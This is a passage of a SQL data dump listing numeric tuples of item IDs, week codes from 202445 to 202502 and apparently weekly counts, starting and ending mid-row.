02445',1),(3240,1,'202445',1),(3249,1,'202445',1),(3251,1,'202445',1),(3267,1,'202445',1),(3282,1,'202445',1),(3531,1,'202445',1),(3714,1,'202445',1),(3721,1,'202445',1),(3724,1,'202445',1),(3735,1,'202445',1),(3742,1,'202445',1),(3774,1,'202445',1),(4301,1,'202445',1),(4332,1,'202445',1),(4341,1,'202445',1),(4377,1,'202445',1),(4391,1,'202445',1),(4412,1,'202445',1),(4416,1,'202445',1),(4428,1,'202445',1),(4436,1,'202445',1),(4454,1,'202445',1),(4457,1,'202445',1),(4517,1,'202445',1),(4551,1,'202445',1),(4645,1,'202445',1),(4654,1,'202445',1),(4657,1,'202445',1),(4691,1,'202445',1),(4712,1,'202445',1),(4722,1,'202445',1),(4744,1,'202445',1),(4762,1,'202445',1),(4858,1,'202445',1),(4866,1,'202445',1),(4874,1,'202445',1),(4897,1,'202445',1),(4976,1,'202445',1),(4996,1,'202445',1),(5033,1,'202445',1),(5067,1,'202445',1),(5071,1,'202445',1),(5080,1,'202445',1),(5128,1,'202445',1),(5137,1,'202445',1),(5153,1,'202445',1),(5248,1,'202445',1),(5276,1,'202445',1),(5298,1,'202445',1),(5304,1,'202445',1),(5307,1,'202445',1),(5330,1,'202445',1),(72,1,'202445',2),(89,1,'202445',2),(102,1,'202445',2),(468,1,'202445',2),(473,1,'202445',2),(488,1,'202445',2),(1695,1,'202445',2),(2152,1,'202445',2),(2154,1,'202445',2),(2165,1,'202445',2),(2457,1,'202445',2),(2956,1,'202445',2),(3083,1,'202445',2),(3096,1,'202445',2),(3107,1,'202445',2),(3259,1,'202445',2),(3265,1,'202445',2),(3271,1,'202445',2),(3430,1,'202445',2),(3489,1,'202445',2),(3534,1,'202445',2),(3541,1,'202445',2),(4400,1,'202445',2),(4520,1,'202445',2),(4983,1,'202445',2),(5356,1,'202445',2),(74,1,'202445',3),(1600,1,'202445',3),(2309,1,'202445',3),(3023,1,'202445',3),(3124,1,'202445',3),(4382,1,'202445',3),(4703,1,'202445',3),(5163,1,'202445',3),(1610,1,'202445',4),(1612,1,'202445',4),(1699,1,'202445',4),(1732,1,'202445',4),(1749,1,'202445',4),(1766,1,'202445',4),(1772,1,'202445',4),(2617,1,'202445',4),(2751,1,'202445',4),(2769,1,'202445',4),(2775,1,'202445',4),(2904,1,'202445',4),(3092,1,'202445',4),(3263,1,'202445',4),(3781,1,'202445',4),(4335,1,'202445',4),(4542,1,'202445',4),(4741,1,'202445',4),(1582,1,'202445',5),(1743,1,'202445',5),(3097,1,'202445',5),(3261,1,'202445',5),(4759,1,'202445',5),(5024,1,'202445',5),(5076,1,'202445',5),(1596,1,'202445',6),(1602,1,'202445',6),(1745,1,'202445',6),(2658,1,'202445',6),(3069,1,'202445',6),(3117,1,'202445',6),(3079,1,'202445',7),(1724,1,'202445',8),(1780,1,'202445',9),(5146,1,'202445',10),(3247,1,'202445',22),(2148,1,'202445',24),(68,1,'202445',37),(80,1,'202445',42),(3060,1,'202445',95),(9,1,'202445',18529),(87,1,'202446',1),(335,1,'202446',1),(473,1,'202446',1),(474,1,'202446',1),(476,1,'202446',1),(480,1,'202446',1),(1544,1,'202446',1),(1584,1,'202446',1),(1588,1,'202446',1),(1596,1,'202446',1),(1606,1,'202446',1),(1701,1,'202446',1),(1715,1,'202446',1),(1718,1,'202446',1),(1745,1,'202446',1),(1751,1,'202446',1),(2150,1,'202446',1),(2152,1,'202446',1),(2178,1,'202446',1),(2457,1,'202446',1),(2775,1,'202446',1),(3038,1,'202446',1),(3069,1,'202446',1),(3072,1,'202446',1),(3269,1,'202446',1),(3271,1,'202446',1),(3498,1,'202446',1),(3724,1,'202446',1),(3727,1,'202446',1),(4335,1,'202446',1),(4382,1,'202446',1),(4404,1,'202446',1),(4416,1,'202446',1),(4454,1,'202446',1),(4529,1,'202446',1),(4551,1,'202446',1),(4608,1,'202446',1),(4645,1,'202446',1),(4768,1,'202446',1),(4977,1,'202446',1),(5033,1,'202446',1),(5042,1,'202446',1),(5046,1,'202446',1),(5062,1,'202446',1),(5125,1,'202446',1),(5137,1,'202446',1),(5157,1,'202446',1),(5163,1,'202446',1),(5248,1,'202446',1),(5256,1,'202446',1),(5259,1,'202446',1),(5268,1,'202446',1),(5271,1,'202446',1),(5298,1,'202446',1),(5353,1,'202446',1),(5359,1,'202446',1),(84,1,'202446',2),(91,1,'202446',2),(470,1,'202446',2),(471,1,'202446',2),(478,1,'202446',2),(479,1,'202446',2),(487,1,'202446',2),(1594,1,'202446',2),(1598,1,'202446',2),(1600,1,'202446',2),(1722,1,'202446',2),(1732,1,'202446',2),(1737,1,'202446',2),(1772,1,'202446',2),(1774,1,'202446',2),(1780,1,'202446',2),(2165,1,'202446',2),(2609,1,'202446',2),(2965,1,'202446',2),(2991,1,'202446',2),(3023,1,'202446',2),(3030,1,'202446',2),(3034,1,'202446',2),(3041,1,'202446',2),(3097,1,'202446',2),(3107,1,'202446',2),(3117,1,'202446',2),(3253,1,'202446',2),(3261,1,'202446',2),(3265,1,'202446',2),(3278,1,'202446',2),(3764,1,'202446',2),(4457,1,'202446',2),(4674,1,'202446',2),(4996,1,'202446',2),(5071,1,'202446',2),(5280,1,'202446',2),(5317,1,'202446',2),(74,1,'202446',3),(468,1,'202446',3),(472,1,'202446',3),(1602,1,'202446',3),(1699,1,'202446',3),(1711,1,'202446',3),(1728,1,'202446',3),(1743,1,'202446',3),(1766,1,'202446',3),(2769,1,'202446',3),(3438,1,'202446',3),(1612,1,'202446',4),(1724,1,'202446',4),(2296,1,'202446',4),(2751,1,'202446',4),(3004,1,'202446',4),(3079,1,'202446',4),(3092,1,'202446',4),(3104,1,'202446',4),(3124,1,'202446',4),(3746,1,'202446',4),(4750,1,'202446',4),(5076,1,'202446',4),(2904,1,'202446',5),(72,1,'202446',6),(1582,1,'202446',6),(2309,1,'202446',6),(3090,1,'202446',6),(5153,1,'202446',6),(2658,1,'202446',7),(3060,1,'202446',7),(4759,1,'202446',7),(1610,1,'202446',8),(1749,1,'202446',8),(2148,1,'202446',9),(4866,1,'202446',10),(3781,1,'202446',11),(3247,1,'202446',20),(68,1,'202446',31),(80,1,'202446',39),(9,1,'202446',11479),(84,1,'202447',1),(87,1,'202447',1),(89,1,'202447',1),(108,1,'202447',1),(481,1,'202447',1),(1588,1,'202447',1),(1594,1,'202447',1),(1596,1,'202447',1),(1598,1,'202447',1),(1602,1,'202447',1),(1612,1,'202447',1),(1614,1,'202447',1),(1695,1,'202447',1),(1709,1,'202447',1),(1711,1,'202447',1),(1722,1,'202447',1),(1730,1,'202447',1),(1739,1,'202447',1),(1751,1,'202447',1),(1770,1,'202447',1),(2154,1,'202447',1),(2178,1,'202447',1),(2248,1,'202447',1),(2297,1,'202447',1),(2457,1,'202447',1),(2748,1,'202447',1),(2965,1,'202447',1),(2991,1,'202447',1),(3005,1,'202447',1),(3023,1,'202447',1),(3045,1,'202447',1),(3072,1,'202447',1),(3127,1,'202447',1),(3226,1,'202447',1),(3265,1,'202447',1),(3438,1,'202447',1),(3479,1,'202447',1),(3534,1,'202447',1),(4373,1,'202447',1),(4382,1,'202447',1),(4420,1,'202447',1),(4514,1,'202447',1),(4517,1,'202447',1),(4529,1,'202447',1),(4587,1,'202447',1),(4608,1,'202447',1),(4612,1,'202447',1),(4648,1,'202447',1),(4694,1,'202447',1),(4703,1,'202447',1),(4750,1,'202447',1),(4753,1,'202447',1),(4771,1,'202447',1),(4878,1,'202447',1),(5020,1,'202447',1),(5058,1,'202447',1),(5125,1,'202447',1),(5134,1,'202447',1),(5140,1,'202447',1),(5146,1,'202447',1),(5289,1,'202447',1),(5307,1,'202447',1),(5363,1,'202447',1),(5378,1,'202447',1),(72,1,'202447',2),(472,1,'202447',2),(478,1,'202447',2),(1600,1,'202447',2),(1720,1,'202447',2),(1747,1,'202447',2),(1749,1,'202447',2),(2751,1,'202447',2),(2964,1,'202447',2),(3004,1,'202447',2),(3261,1,'202447',2),(3263,1,'202447',2),(3307,1,'202447',2),(4412,1,'202447',2),(4759,1,'202447',2),(4888,1,'202447',2),(4893,1,'202447',2),(5101,1,'202447',2),(5310,1,'202447',2),(74,1,'202447',3),(1544,1,'202447',3),(1610,1,'202447',3),(1715,1,'202447',3),(2150,1,'202447',3),(3285,1,'202447',3),(4542,1,'202447',3),(4996,1,'202447',3),(5076,1,'202447',3),(5163,1,'202447',3),(476,1,'202447',4),(1728,1,'202447',4),(2769,1,'202447',4),(3764,1,'202447',4),(1732,1,'202447',5),(2904,1,'202447',5),(1582,1,'202447',6),(1592,1,'202447',6),(1724,1,'202447',6),(1743,1,'202447',6),(1745,1,'202447',6),(1772,1,'202447',6),(1780,1,'202447',6),(3092,1,'202447',6),(1699,1,'202447',7),(3079,1,'202447',7),(1766,1,'202447',8),(2658,1,'202447',8),(3038,1,'202447',8),(3097,1,'202447',8),(2148,1,'202447',10),(3781,1,'202447',12),(3247,1,'202447',23),(80,1,'202447',30),(68,1,'202447',41),(9,1,'202447',23144),(72,1,'202448',1),(76,1,'202448',1),(474,1,'202448',1),(479,1,'202448',1),(483,1,'202448',1),(484,1,'202448',1),(485,1,'202448',1),(486,1,'202448',1),(487,1,'202448',1),(1590,1,'202448',1),(1592,1,'202448',1),(1598,1,'202448',1),(1604,1,'202448',1),(1612,1,'202448',1),(1705,1,'202448',1),(1709,1,'202448',1),(1718,1,'202448',1),(1720,1,'202448',1),(1737,1,'202448',1),(1768,1,'202448',1),(2150,1,'202448',1),(2248,1,'202448',1),(2293,1,'202448',1),(2809,1,'202448',1),(2911,1,'202448',1),(3004,1,'202448',1),(3005,1,'202448',1),(3038,1,'202448',1),(3045,1,'202448',1),(3069,1,'202448',1),(3083,1,'202448',1),(3226,1,'202448',1),(3240,1,'202448',1),(3251,1,'202448',1),(3253,1,'202448',1),(3267,1,'202448',1),(3273,1,'202448',1),(3280,1,'202448',1),(3498,1,'202448',1),(3531,1,'202448',1),(3710,1,'202448',1),(4301,1,'202448',1),(4391,1,'202448',1),(4412,1,'202448',1),(4428,1,'202448',1),(4440,1,'202448',1),(4457,1,'202448',1),(4520,1,'202448',1),(4524,1,'202448',1),(4645,1,'202448',1),(4648,1,'202448',1),(4651,1,'202448',1),(4657,1,'202448',1),(4681,1,'202448',1),(4691,1,'202448',1),(4694,1,'202448',1),(4706,1,'202448',1),(4712,1,'202448',1),(4759,1,'202448',1),(4870,1,'202448',1),(4883,1,'202448',1),(4897,1,'202448',1),(4988,1,'202448',1),(5024,1,'202448',1),(5058,1,'202448',1),(5071,1,'202448',1),(5128,1,'202448',1),(5140,1,'202448',1),(5157,1,'202448',1),(5248,1,'202448',1),(5271,1,'202448',1),(5280,1,'202448',1),(5295,1,'202448',1),(5298,1,'202448',1),(5304,1,'202448',1),(5307,1,'202448',1),(5320,1,'202448',1),(74,1,'202448',2),(472,1,'202448',2),(473,1,'202448',2),(1544,1,'202448',2),(1594,1,'202448',2),(1600,1,'202448',2),(1602,1,'202448',2),(1722,1,'202448',2),(1730,1,'202448',2),(1739,1,'202448',2),(2154,1,'202448',2),(2252,1,'202448',2),(2309,1,'202448',2),(2609,1,'202448',2),(2801,1,'202448',2),(3006,1,'202448',2),(3041,1,'202448',2),(3124,1,'202448',2),(3265,1,'202448',2),(3285,1,'202448',2),(3534,1,'202448',2),(3738,1,'202448',2),(3746,1,'202448',2),(4329,1,'202448',2),(4416,1,'202448',2),(4420,1,'202448',2),(4432,1,'202448',2),(4546,1,'202448',2),(4750,1,'202448',2),(5042,1,'202448',2),(5131,1,'202448',2),(5153,1,'202448',2),(5264,1,'202448',2),(87,1,'202448',3),(89,1,'202448',3),(488,1,'202448',3),(1586,1,'202448',3),(1695,1,'202448',3),(1703,1,'202448',3),(1774,1,'202448',3),(2165,1,'202448',3),(2704,1,'202448',3),(3023,1,'202448',3),(3090,1,'202448',3),(3107,1,'202448',3),(3109,1,'202448',3),(3438,1,'202448',3),(3479,1,'202448',3),(3777,1,'202448',3),(4382,1,'202448',3),(4436,1,'202448',3),(5067,1,'202448',3),(5080,1,'202448',3),(5163,1,'202448',3),(5301,1,'202448',3),(5359,1,'202448',3),(477,1,'202448',4),(1582,1,'202448',4),(1610,1,'202448',4),(1751,1,'202448',4),(2769,1,'202448',4),(2904,1,'202448',4),(3781,1,'202448',4),(5076,1,'202448',4),(1588,1,'202448',5),(1711,1,'202448',5),(4996,1,'202448',5),(5046,1,'202448',5),(476,1,'202448',6),(3117,1,'202448',6),(2148,1,'202448',10),(4542,1,'202448',10),(3060,1,'202448',11),(1743,1,'202448',12),(3079,1,'202448',12),(3261,1,'202448',13),(3263,1,'202448',13),(1699,1,'202448',14),(1728,1,'202448',14),(1732,1,'202448',14),(1745,1,'202448',14),(1780,1,'202448',14),(2751,1,'202448',14),(3092,1,'202448',14),(1749,1,'202448',15),(1772,1,'202448',15),(2658,1,'202448',15),(1724,1,'202448',17),(3097,1,'202448',17),(68,1,'202448',28),(3247,1,'202448',29),(80,1,'202448',43),(9,1,'202448',13782),(335,1,'202449',1),(467,1,'202449',1),(468,1,'202449',1),(472,1,'202449',1),(482,1,'202449',1),(483,1,'202449',1),(1586,1,'202449',1),(1614,1,'202449',1),(1695,1,'202449',1),(1737,1,'202449',1),(2159,1,'202449',1),(2704,1,'202449',1),(2904,1,'202449',1),(2911,1,'202449',1),(2956,1,'202449',1),(2991,1,'202449',1),(3041,1,'202449',1),(3066,1,'202449',1),(3090,1,'202449',1),(3109,1,'202449',1),(3257,1,'202449',1),(3290,1,'202449',1),(3710,1,'202449',1),(4329,1,'202449',1),(4335,1,'202449',1),(4391,1,'202449',1),(4400,1,'202449',1),(4436,1,'202449',1),(4556,1,'202449',1),(4654,1,'202449',1),(4668,1,'202449',1),(4691,1,'202449',1),(4747,1,'202449',1),(4759,1,'202449',1),(4765,1,'202449',1),(4858,1,'202449',1),(4874,1,'202449',1),(4883,1,'202449',1),(5122,1,'202449',1),(5157,1,'202449',1),(5163,1,'202449',1),(5268,1,'202449',1),(5304,1,'202449',1),(84,1,'202449',2),(87,1,'202449',2),(89,1,'202449',2),(91,1,'202449',2),(102,1,'202449',2),(1584,1,'202449',2),(1588,1,'202449',2),(1594,1,'202449',2),(1600,1,'202449',2),(1701,1,'202449',2),(1703,1,'202449',2),(1726,1,'202449',2),(1734,1,'202449',2),(1739,1,'202449',2),(1776,1,'202449',2),(2154,1,'202449',2),(2178,1,'202449',2),(2248,1,'202449',2),(2503,1,'202449',2),(2617,1,'202449',2),(2775,1,'202449',2),(2813,1,'202449',2),(2993,1,'202449',2),(3027,1,'202449',2),(3038,1,'202449',2),(3096,1,'202449',2),(3102,1,'202449',2),(3124,1,'202449',2),(3243,1,'202449',2),(3265,1,'202449',2),(3498,1,'202449',2),(3764,1,'202449',2),(4323,1,'202449',2),(4408,1,'202449',2),(4457,1,'202449',2),(4591,1,'202449',2),(4677,1,'202449',2),(4697,1,'202449',2),(4771,1,'202449',2),(4866,1,'202449',2),(4996,1,'202449',2),(5131,1,'202449',2),(5146,1,'202449',2),(5248,1,'202449',2),(5259,1,'202449',2),(5356,1,'202449',2),(74,1,'202449',3),(478,1,'202449',3),(1544,1,'202449',3),(1610,1,'202449',3),(1612,1,'202449',3),(1707,1,'202449',3),(2297,1,'202449',3),(3724,1,'202449',3),(4412,1,'202449',3),(5071,1,'202449',3),(1598,1,'202449',4),(1602,1,'202449',4),(1728,1,'202449',4),(1770,1,'202449',4),(2150,1,'202449',4),(2165,1,'202449',4),(3023,1,'202449',4),(3030,1,'202449',4),(3104,1,'202449',4),(4301,1,'202449',4),(4776,1,'202449',4),(1592,1,'202449',5),(2161,1,'202449',5),(5076,1,'202449',5),(1596,1,'202449',6),(2457,1,'202449',6),(4363,1,'202449',6),(1766,1,'202449',7),(3060,1,'202449',8),(3117,1,'202449',8),(4420,1,'202449',8),(1732,1,'202449',9),(1582,1,'202449',10),(1780,1,'202449',10),(2148,1,'202449',10),(3097,1,'202449',10),(4542,1,'202449',10),(1745,1,'202449',11),(1749,1,'202449',11),(3079,1,'202449',11),(3261,1,'202449',11),(3781,1,'202449',11),(1772,1,'202449',12),(2658,1,'202449',12),(2751,1,'202449',12),(3263,1,'202449',12),(1743,1,'202449',13),(1699,1,'202449',14),(1724,1,'202449',14),(3092,1,'202449',15),(80,1,'202449',35),(68,1,'202449',39),(3247,1,'202449',107),(9,1,'202449',19802),(74,1,'202450',1),(469,1,'202450',1),(473,1,'202450',1),(476,1,'202450',1),(478,1,'202450',1),(487,1,'202450',1),(1590,1,'202450',1),(1600,1,'202450',1),(1604,1,'202450',1),(1608,1,'202450',1),(1614,1,'202450',1),(1709,1,'202450',1),(1711,1,'202450',1),(1726,1,'202450',1),(2775,1,'202450',1),(3023,1,'202450',1),(3027,1,'202450',1),(3041,1,'202450',1),(3090,1,'202450',1),(3282,1,'202450',1),(3316,1,'202450',1),(3534,1,'202450',1),(3764,1,'202450',1),(4335,1,'202450',1),(4357,1,'202450',1),(4391,1,'202450',1),(4408,1,'202450',1),(4412,1,'202450',1),(4648,1,'202450',1),(4668,1,'202450',1),(4677,1,'202450',1),(4700,1,'202450',1),(4703,1,'202450',1),(4750,1,'202450',1),(4759,1,'202450',1),(4762,1,'202450',1),(5042,1,'202450',1),(5046,1,'202450',1),(5125,1,'202450',1),(5128,1,'202450',1),(5163,1,'202450',1),(5256,1,'202450',1),(5268,1,'202450',1),(5289,1,'202450',1),(5314,1,'202450',1),(5320,1,'202450',1),(5323,1,'202450',1),(5334,1,'202450',1),(5374,1,'202450',1),(1584,1,'202450',2),(1592,1,'202450',2),(1610,1,'202450',2),(1701,1,'202450',2),(1703,1,'202450',2),(2503,1,'202450',2),(2609,1,'202450',2),(3030,1,'202450',2),(3038,1,'202450',2),(4420,1,'202450',2),(4996,1,'202450',2),(5020,1,'202450',2),(1586,1,'202450',3),(1588,1,'202450',3),(1743,1,'202450',3),(1745,1,'202450',3),(2161,1,'202450',3),(2904,1,'202450',3),(5076,1,'202450',3),(1594,1,'202450',4),(1602,1,'202450',4),(1732,1,'202450',4),(1749,1,'202450',4),(1766,1,'202450',4),(1772,1,'202450',4),(1780,1,'202450',4),(2309,1,'202450',4),(2658,1,'202450',4),(2751,1,'202450',4),(3117,1,'202450',4),(3263,1,'202450',4),(4363,1,'202450',4),(4517,1,'202450',4),(4866,1,'202450',4),(5330,1,'202450',4),(1598,1,'202450',5),(1612,1,'202450',5),(1728,1,'202450',5),(1770,1,'202450',5),(2165,1,'202450',5),(3060,1,'202450',5),(3079,1,'202450',5),(4776,1,'202450',5),(2457,1,'202450',6),(3092,1,'202450',6),(3097,1,'202450',6),(3261,1,'202450',6),(4368,1,'202450',6),(4542,1,'202450',6),(1699,1,'202450',7),(1724,1,'202450',8),(3781,1,'202450',8),(1544,1,'202450',9),(1582,1,'202450',10),(3247,1,'202450',16),(68,1,'202450',29),(80,1,'202450',54),(9,1,'202450',10795),(110,1,'202451',1),(335,1,'202451',1),(468,1,'202451',1),(469,1,'202451',1),(471,1,'202451',1),(473,1,'202451',1),(474,1,'202451',1),(478,1,'202451',1),(479,1,'202451',1),(480,1,'202451',1),(487,1,'202451',1),(1594,1,'202451',1),(1596,1,'202451',1),(1604,1,'202451',1),(1608,1,'202451',1),(1610,1,'202451',1),(1614,1,'202451',1),(1699,1,'202451',1),(1741,1,'202451',1),(1743,1,'202451',1),(1745,1,'202451',1),(1747,1,'202451',1),(1749,1,'202451',1),(1766,1,'202451',1),(1776,1,'202451',1),(2178,1,'202451',1),(2252,1,'202451',1),(2309,1,'202451',1),(2609,1,'202451',1),(3006,1,'202451',1),(3030,1,'202451',1),(3034,1,'202451',1),(3041,1,'202451',1),(3090,1,'202451',1),(3097,1,'202451',1),(3127,1,'202451',1),(3226,1,'202451',1),(3243,1,'202451',1),(3259,1,'202451',1),(3261,1,'202451',1),(3263,1,'202451',1),(3275,1,'202451',1),(3290,1,'202451',1),(3316,1,'202451',1),(3721,1,'202451',1),(3727,1,'202451',1),(3731,1,'202451',1),(3738,1,'202451',1),(3749,1,'202451',1),(3771,1,'202451',1),(4326,1,'202451',1),(4391,1,'202451',1),(4396,1,'202451',1),(4412,1,'202451',1),(4457,1,'202451',1),(4524,1,'202451',1),(4542,1,'202451',1),(4551,1,'202451',1),(4566,1,'202451',1),(4608,1,'202451',1),(4651,1,'202451',1),(4657,1,'202451',1),(4660,1,'202451',1),(4674,1,'202451',1),(4677,1,'202451',1),(4681,1,'202451',1),(4697,1,'202451',1),(4744,1,'202451',1),(4747,1,'202451',1),(4753,1,'202451',1),(4762,1,'202451',1),(4797,1,'202451',1),(4858,1,'202451',1),(4866,1,'202451',1),(4893,1,'202451',1),(4977,1,'202451',1),(4980,1,'202451',1),(5037,1,'202451',1),(5058,1,'202451',1),(5128,1,'202451',1),(5137,1,'202451',1),(5163,1,'202451',1),(5276,1,'202451',1),(5310,1,'202451',1),(72,1,'202451',2),(102,1,'202451',2),(467,1,'202451',2),(472,1,'202451',2),(484,1,'202451',2),(1584,1,'202451',2),(1588,1,'202451',2),(1592,1,'202451',2),(1606,1,'202451',2),(1732,1,'202451',2),(2063,1,'202451',2),(2704,1,'202451',2),(2748,1,'202451',2),(2813,1,'202451',2),(2993,1,'202451',2),(3066,1,'202451',2),(3079,1,'202451',2),(3087,1,'202451',2),(3092,1,'202451',2),(3240,1,'202451',2),(3245,1,'202451',2),(3253,1,'202451',2),(3482,1,'202451',2),(3534,1,'202451',2),(4654,1,'202451',2),(4694,1,'202451',2),(4759,1,'202451',2),(5024,1,'202451',2),(5028,1,'202451',2),(5076,1,'202451',2),(5304,1,'202451',2),(5307,1,'202451',2),(87,1,'202451',3),(1602,1,'202451',3),(1722,1,'202451',3),(1772,1,'202451',3),(3124,1,'202451',3),(3489,1,'202451',3),(3764,1,'202451',3),(4382,1,'202451',3),(4930,1,'202451',3),(5264,1,'202451',3),(2964,1,'202451',4),(5374,1,'202451',4),(76,1,'202451',5),(1586,1,'202451',5),(1770,1,'202451',5),(2658,1,'202451',5),(2904,1,'202451',5),(3247,1,'202451',5),(3781,1,'202451',5),(4357,1,'202451',5),(470,1,'202451',6),(1612,1,'202451',6),(2457,1,'202451',6),(3117,1,'202451',6),(4363,1,'202451',6),(4776,1,'202451',6),(1598,1,'202451',7),(1728,1,'202451',7),(3060,1,'202451',7),(2165,1,'202451',8),(1724,1,'202451',9),(1582,1,'202451',10),(1544,1,'202451',14),(68,1,'202451',31),(80,1,'202451',35),(9,1,'202451',16317),(72,1,'202452',1),(76,1,'202452',1),(89,1,'202452',1),(110,1,'202452',1),(476,1,'202452',1),(481,1,'202452',1),(482,1,'202452',1),(485,1,'202452',1),(1614,1,'202452',1),(1707,1,'202452',1),(1709,1,'202452',1),(1724,1,'202452',1),(1737,1,'202452',1),(1739,1,'202452',1),(2152,1,'202452',1),(2248,1,'202452',1),(2296,1,'202452',1),(2297,1,'202452',1),(2658,1,'202452',1),(2809,1,'202452',1),(2964,1,'202452',1),(2965,1,'202452',1),(3030,1,'202452',1),(3072,1,'202452',1),(3083,1,'202452',1),(3097,1,'202452',1),(3107,1,'202452',1),(3253,1,'202452',1),(3271,1,'202452',1),(3273,1,'202452',1),(3275,1,'202452',1),(3280,1,'202452',1),(3282,1,'202452',1),(3290,1,'202452',1),(3534,1,'202452',1),(3710,1,'202452',1),(3724,1,'202452',1),(3742,1,'202452',1),(3752,1,'202452',1),(4301,1,'202452',1),(4368,1,'202452',1),(4382,1,'202452',1),(4400,1,'202452',1),(4416,1,'202452',1),(4420,1,'202452',1),(4436,1,'202452',1),(4457,1,'202452',1),(4520,1,'202452',1),(4582,1,'202452',1),(4587,1,'202452',1),(4648,1,'202452',1),(4691,1,'202452',1),(4706,1,'202452',1),(4753,1,'202452',1),(4768,1,'202452',1),(4771,1,'202452',1),(4930,1,'202452',1),(4976,1,'202452',1),(4988,1,'202452',1),(4996,1,'202452',1),(5020,1,'202452',1),(5024,1,'202452',1),(5080,1,'202452',1),(5122,1,'202452',1),(5137,1,'202452',1),(5146,1,'202452',1),(5153,1,'202452',1),(5163,1,'202452',1),(5248,1,'202452',1),(5256,1,'202452',1),(5264,1,'202452',1),(5271,1,'202452',1),(5289,1,'202452',1),(5298,1,'202452',1),(5301,1,'202452',1),(5310,1,'202452',1),(5317,1,'202452',1),(5330,1,'202452',1),(5353,1,'202452',1),(5356,1,'202452',1),(335,1,'202452',2),(468,1,'202452',2),(474,1,'202452',2),(487,1,'202452',2),(570,1,'202452',2),(1590,1,'202452',2),(1596,1,'202452',2),(1600,1,'202452',2),(1610,1,'202452',2),(1699,1,'202452',2),(1701,1,'202452',2),(1703,1,'202452',2),(1711,1,'202452',2),(1718,1,'202452',2),(1732,1,'202452',2),(1734,1,'202452',2),(1745,1,'202452',2),(1770,1,'202452',2),(1774,1,'202452',2),(2154,1,'202452',2),(2165,1,'202452',2),(2178,1,'202452',2),(2309,1,'202452',2),(2989,1,'202452',2),(3004,1,'202452',2),(3034,1,'202452',2),(3038,1,'202452',2),(3041,1,'202452',2),(3045,1,'202452',2),(3079,1,'202452',2),(3102,1,'202452',2),(3109,1,'202452',2),(3226,1,'202452',2),(3245,1,'202452',2),(3316,1,'202452',2),(3541,1,'202452',2),(4363,1,'202452',2),(4387,1,'202452',2),(4542,1,'202452',2),(4566,1,'202452',2),(4660,1,'202452',2),(4694,1,'202452',2),(4756,1,'202452',2),(4776,1,'202452',2),(5076,1,'202452',2),(5101,1,'202452',2),(1594,1,'202452',3),(1726,1,'202452',3),(1730,1,'202452',3),(1772,1,'202452',3),(2748,1,'202452',3),(3066,1,'202452',3),(4357,1,'202452',3),(4759,1,'202452',3),(1586,1,'202452',4),(1598,1,'202452',4),(1602,1,'202452',4),(1743,1,'202452',4),(2457,1,'202452',4),(3060,1,'202452',4),(3489,1,'202452',4),(4396,1,'202452',4),(4722,1,'202452',4),(5050,1,'202452',4),(1749,1,'202452',5),(2904,1,'202452',5),(3092,1,'202452',5),(4341,1,'202452',5),(4373,1,'202452',5),(1728,1,'202452',6),(1780,1,'202452',6),(3117,1,'202452',6),(3247,1,'202452',6),(1582,1,'202452',7),(1544,1,'202452',11),(3781,1,'202452',11),(68,1,'202452',31),(80,1,'202452',42),(9,1,'202452',20274),(74,1,'202501',1),(335,1,'202501',1),(467,1,'202501',1),(469,1,'202501',1),(471,1,'202501',1),(477,1,'202501',1),(479,1,'202501',1),(486,1,'202501',1),(1544,1,'202501',1),(1588,1,'202501',1),(1590,1,'202501',1),(1594,1,'202501',1),(1598,1,'202501',1),(1604,1,'202501',1),(1610,1,'202501',1),(1697,1,'202501',1),(1713,1,'202501',1),(1732,1,'202501',1),(1745,1,'202501',1),(1770,1,'202501',1),(2156,1,'202501',1),(2159,1,'202501',1),(2178,1,'202501',1),(2457,1,'202501',1),(2658,1,'202501',1),(2704,1,'202501',1),(2775,1,'202501',1),(2804,1,'202501',1),(3006,1,'202501',1),(3069,1,'202501',1),(3079,1,'202501',1),(3090,1,'202501',1),(3104,1,'202501',1),(3226,1,'202501',1),(3240,1,'202501',1),(3275,1,'202501',1),(3285,1,'202501',1),(3489,1,'202501',1),(3498,1,'202501',1),(3721,1,'202501',1),(3742,1,'202501',1),(4238,1,'202501',1),(4329,1,'202501',1),(4420,1,'202501',1),(4454,1,'202501',1),(4566,1,'202501',1),(4587,1,'202501',1),(4591,1,'202501',1),(4648,1,'202501',1),(4654,1,'202501',1),(4657,1,'202501',1),(4668,1,'202501',1),(4681,1,'202501',1),(4691,1,'202501',1),(4697,1,'202501',1),(4703,1,'202501',1),(4706,1,'202501',1),(4753,1,'202501',1),(4792,1,'202501',1),(4802,1,'202501',1),(4870,1,'202501',1),(4976,1,'202501',1),(4977,1,'202501',1),(5046,1,'202501',1),(5050,1,'202501',1),(5058,1,'202501',1),(5067,1,'202501',1),(5071,1,'202501',1),(5125,1,'202501',1),(5137,1,'202501',1),(5153,1,'202501',1),(5157,1,'202501',1),(5253,1,'202501',1),(5271,1,'202501',1),(5307,1,'202501',1),(5320,1,'202501',1),(5383,1,'202501',1),(72,1,'202501',2),(470,1,'202501',2),(472,1,'202501',2),(488,1,'202501',2),(1600,1,'202501',2),(1602,1,'202501',2),(1612,1,'202501',2),(1722,1,'202501',2),(1726,1,'202501',2),(1728,1,'202501',2),(2148,1,'202501',2),(2165,1,'202501',2),(2293,1,'202501',2),(2297,1,'202501',2),(2751,1,'202501',2),(3004,1,'202501',2),(3023,1,'202501',2),(3063,1,'202501',2),(3096,1,'202501',2),(3117,1,'202501',2),(3243,1,'202501',2),(3259,1,'202501',2),(3282,1,'202501',2),(3287,1,'202501',2),(3290,1,'202501',2),(3307,1,'202501',2),(4341,1,'202501',2),(4363,1,'202501',2),(4391,1,'202501',2),(4412,1,'202501',2),(4457,1,'202501',2),(4694,1,'202501',2),(4722,1,'202501',2),(4776,1,'202501',2),(5033,1,'202501',2),(5280,1,'202501',2),(5304,1,'202501',2),(76,1,'202501',3),(478,1,'202501',3),(481,1,'202501',3),(1582,1,'202501',3),(1584,1,'202501',3),(1614,1,'202501',3),(1720,1,'202501',3),(2296,1,'202501',3),(3083,1,'202501',3),(3261,1,'202501',3),(3263,1,'202501',3),(4542,1,'202501',3),(4608,1,'202501',3),(4645,1,'202501',3),(5076,1,'202501',3),(476,1,'202501',4),(1608,1,'202501',4),(1772,1,'202501',4),(3034,1,'202501',4),(1724,1,'202501',5),(2904,1,'202501',5),(1586,1,'202501',6),(1749,1,'202501',6),(1780,1,'202501',6),(3005,1,'202501',6),(3764,1,'202501',6),(3060,1,'202501',7),(3247,1,'202501',7),(1743,1,'202501',10),(3092,1,'202501',10),(3781,1,'202501',17),(80,1,'202501',31),(68,1,'202501',40),(9,1,'202501',21347),(72,1,'202502',1),